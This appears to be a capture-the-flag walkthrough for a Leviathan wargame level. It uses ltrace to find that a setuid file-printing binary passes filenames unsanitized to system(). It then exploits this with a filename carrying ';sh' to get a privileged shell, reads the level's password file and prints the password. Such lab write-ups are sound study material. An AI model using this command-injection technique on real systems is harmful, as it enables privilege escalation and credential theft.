The printfile will print a file content on screen. However, trying to show the leviathan3 password result in permission issue.
./printfile /etc/leviathan_pass/leviathan3 You cant have that file...
Let do a ltrace again with the password and see what happened.
ltrace ./printfile /etc/leviathan_pass/leviathan3 __libc_start_main(0x80484f4, 2, -10332, 0x80485d0, 0x8048640 <unfinished ...> access("/etc/leviathan_pass/leviathan3", 4) = -1 puts("You cant have that file..."You cant have that file... ) = 27 +++ exited (status 1) +++
Let see what happen if we use printfile correctly.
ltrace ./printfile /tmp/l2/test __libc_start_main(0x80484f4, 2, -10316, 0x80485d0, 0x8048640 <unfinished ...> access("/tmp/l2/test", 4) = 0 snprintf("/bin/cat /tmp/l2/test", 511, "/bin/cat %s", "/tmp/l2/test") = 21 system("/bin/cat /tmp/l2/test" <unfinished ...> --- SIGCHLD (Child exited) --- <... system resumed> ) = 0 +++ exited (status 0) +++
Notice it will check the access level and then print the file using /bin/cat on the filename. The problem with this is that there is no input sanitizing and we can attach a filename that do additional commands. First thing comes to mind is to append a command to read the password file but “/” is not allow in a file name. So we could use “;” to add a second command that spawn a shell.
touch "/tmp/l2/test;sh" ./prinfile "/tmp/l2/test;sh"
We simply read the content of the password file for the next level after we spawn a shell using elevated permission.
whoami leviathan3 cat /etc/leviathan_pass/leviathan3 Ahdiemoo1j